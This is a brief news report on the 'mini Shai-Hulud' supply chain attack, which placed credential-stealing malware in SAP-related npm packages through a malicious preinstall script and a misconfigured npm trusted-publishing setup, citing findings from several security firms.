Supply chain attack hits SAP npm packages with malware

Cybersecurity researchers exposed a new supply chain attack on April 29, 2026, compromising SAP-related npm packages with sophisticated credential-stealing malware according to reports. Dubbed mini Shai-Hulud, the campaign specifically targeted packages like mbt and three @cap-js modules used in the SAP JavaScript development ecosystem.

The malicious versions introduced a preinstall script that downloaded and executed a payload, a detail confirmed by Socket. This payload was designed to harvest developer credentials, GitHub and npm tokens, and secrets from major cloud platforms including AWS, Azure, and GCP.

Consequently, the stolen data was encrypted with AES-256-GCM and sent to public GitHub repositories created on victim accounts. The malware also gained persistence by injecting files into repositories to trigger execution when opened in code editors like VS Code.

Meanwhile, Wiz noted the attack shares features with prior TeamPCP operations, suggesting the same threat actor. The attackers compromised a developer account and exploited a critical configuration gap in npm‘s OIDC trusted publishing.

SafeDep explained the publisher configuration for one package trusted any workflow, not just the canonical one. This allowed a branch push to obtain a token for publishing the malicious packages without proper provenance.

In response, the maintainers and the cds-dbs team have released new, safe versions to supersede the compromised ones. StepSecurity highlighted this as a pioneering attack vector for targeting AI coding agent configurations.

✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.

Previous Articles:

• Sky Reports Record Q1 Revenue As Token Value Declines
• Farage’s Secret $6.7M Gift From Tether Investor Revealed
• Robinhood’s 11 Businesses Top $100M Revenue
• Computershare Partners to Tokenize Corporate Shares
• KuCoin EU Names New AML Chief After Austrian Ban